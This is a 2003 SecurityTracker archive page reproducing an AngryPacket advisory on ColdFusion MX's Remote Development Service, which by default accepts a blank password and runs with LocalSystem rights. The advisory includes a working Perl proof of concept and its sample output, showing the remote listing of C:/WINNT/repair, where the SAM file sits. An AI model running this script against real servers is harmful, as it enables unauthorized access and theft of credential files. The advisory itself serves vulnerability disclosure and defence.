SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Adobe ColdFusion Vendors:   Macromedia
ColdFusion MX Server Default Configuration Gives Remote Users RDS Access
SecurityTracker Alert ID:  1007124
SecurityTracker URL:  http://securitytracker.com/id/1007124
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 7 2003
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in ColdFusion MX Server. A remote user can gain access to the server in the default configuration.

AngryPacket issued a security advisory warning that the default configuration of the Remote Development Service (RDS) does not require a password for authentication. On systems where the administrator has not set a password, a remote user can gain access.

Also by default, it is reported that the RDS Java servlet runs in the context of the ColdFusion application service account, with LocalSystem privileges. A remote authenticated user can reportedly reconfigure their website properties to be able to get and put any file on the server.

It is also reported that when the RDS password is set, the password is transmitted over the network in plain text (without encryption). A remote user that is sniffing the network can obtain the password.

Finally, it is also reported that ASP SESSION IDs are not validated.

Some demonstration exploit code is provided in the Source Message and in the original advisory at:

http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt

The following notification timeline is provided:

Initial Email - Remote RDS problem and sample runtime exploit code -> Sun Jun 29 18:30:21 CDT 2003
Status: (mon) No Response
Call Macromedia - Get treated like a peckerhead and no one cares.. . -> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time.
Next day ( tues ).. .. No one responds.. .. Oh well Post code.

Impact:   A remote authenticated user can read and write files on the target server.

A remote user can gain access to the system (if the system has not been configured with a password).

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.macromedia.com/ (Links to External Site)
Cause:   Access control error, Authentication error, Configuration error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  AngryPacket Security Advisory


http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt

                   - -- ------------------------- -- -
[>(]                 AngryPacket Security Advisory                 [>(]
                   - -- ------------------------- -- -

+--------------------- -- -
+ advisory information
+------------------ -- -
Exploit Code: 		    Victim1 <victim1@angrypacket.com>
Initial Bug Report By:      rs2112 <rs2112@hushmail.com>
release date: 06/26/2003


+------------------- -- -
+ timeline of Vendor Notification
+------------------- -- -
1: Initial Email - Remote RDS problem and sample runtime exploit code
-> Sun Jun 29 18:30:21 CDT 2003
1a: Status: (mon) No Response
2: Call Macromedia - Get treated like a peckerhead and no one cares.. .
-> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time.
2a: Next day ( tues ).. .. No one responds.. .. Oh well Post code.

+-------------------- -- -
+ product information
+----------------- -- -
software:     Cold Fusion server
vendor:       Macromedia
homepage:     http://www.macromedia.com
description:

With ColdFusion MX, you can build and deploy powerful web applications and web
services with far less training time and fewer lines of code than ASP, PHP, and
JSP. Now available in versions that support industry leading J2EE application
servers, ColdFusion MX enables web application developers to easily harness the
power of the Java platform.

+---------------------- -- -
+ vulnerability details
+------------------- -- -
problem1:     Default Remote Development Service (RDS) configuration.( read, write, retrieve )
problem2:     ASP SESSION ID's are not validated.
affected:     Cold Fusion Server MX

explaination: ColdFusion RDS allows developers to securely access remote files
and data sources, and debug CFML code. Developers can use RDS through
ColdFusion Studio, Homesite+, and Dreamweaver MX to access files and databases
on a remote ColdFusion development server using HTTP. Under CF 4.5/5, RDS ran
as a service; under CFMX, RDS is a JAVA servlet that runs under the context of
the CF Application service account. In both cases, by default, RDS has
LocalSystem authority to the box.   When properly configured, RDS requires a
(static) password to authenticate the remote developer.  The first
vulnerability (1) is that, due to this level of access, a remote user can
reconfigure their website properties to access (put and get) any file on the CF
server. The second vulnerability (2) is that, by default, RDS does not require
a password for authentication (null password).  Therefore, anyone with a RDS
compatible development application, can attach to a CF server running RDS,
authenticate with a blank password, and own the box. The third vulnerability
(3) is that when the RDS password is set, it is sent over the wire in clear
text.




risk:         High
status:       Awaiting vendor response. ( Read Timeline: Above )
exploit:      As a proof of concept, victim1 has developed beta code that can
be used to exploit the RDS <blank> password vulnerability.  The code
demonstrates that fact that it would be a trivial task to scan the Internet,
determine which servers are running CF, and compromise the box.



fix:	Vulnerability 1 - use a dedicated service account with restricted access to the	server.
	Vulnerability 2 - set the d*mn password
	Vulnerability 3 - ASP SESSION ID not validated.
	Vulnerability 4 - ??	

+-------- -- -
+ credits
+----- -- -
Vulnerability reported by rs2112.
Exploit code developed by Victim1 of AngryPacket Security group.

+--------------
+  exploit:
+-------------

#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com

## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or 
modification of this code you are completely on your OWN,
# I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is 
meant for administrators to protect themselves against
# attack and thats it.

## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver 
client connection just FYI,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on 
the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a 
nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them 
several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to and 
*.exe it will attempt to become and
# 16bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certian current situations I am not allowed to release full exploit code with ( 
READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically dont bother.
#
# Im sorry for being such a foil fart but hey, you understand im shure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 
50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# 
sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------


use strict;
use IO::Socket;

use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:		      		Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:   		Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:		      		Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 		Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: 	Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:					Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:	Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:	Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:	Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:				Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:			Content-Length: 37


# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need 
to know
# the $string_val.
@clength = ( "Content-Length: 46",
	     "Content-Length: 28",
	     "Content-Length: 47",
	     "Content-Length: 46",
        	     #"Content-Length: 32",
	     #"Content-Length: 50",
	     "Content-Length: 46",
	     "Content-Length: 51",
	     "Content-Length: 46",
	     "Content-Length: 24",
	     "Content-Length: 46",
	     "Content-Length: 53",
	     "Content-Length: 46",
	     "Content-Length: 53",
	     "Content-Length: 46",
	     "Content-Length: 51",
	     "Content-Length: 46",
	     "Content-Length: 29",
	     "Content-Length: 46",
	     "Content-Length: 37"
	   );


@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:7:C:/_mm/STR:1:*STR:0:",
	    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
	    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:3:C:/STR:1:*STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
	    );



system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";


print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++  ) {
	for ( $c = 0; $c < @clength; $c++ ) {	
			if( $i == $c ) {
			&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
		}
	}
}


sub gen_sock() {
	my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
					PeerPort => $PORT,
					Proto	 => 'tcp',
					);
	die "Socket Could not be established ! $!" unless $sock;
	print "Target: $TARGET:$PORT\n";
	print "$POST\n";
	print "Request String Value: $rarray[$i]\n";
	print "$clength[$c]\n";
	print "Please wait.. ..\n";
	print $sock "$POST";
	print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
	print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
	print $sock "Host: $TARGET\r\n";
	print $sock "$clength[$c]\r\n";
	print $sock "Connection: Keep-Alive\r\n";
	print $sock "Cache-Control: no-cache\r\n";
	print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
	print $sock "\r\n";
	print $sock "$rarray[$i]";
	
	# lets return and print data to term
	while($response = <$sock>) {
		chomp($response);
		print "$response\n";
	}
	close($sock);
}




+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.

Oh and Happy 4th of July !
- -- -------------------------


#EOT




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC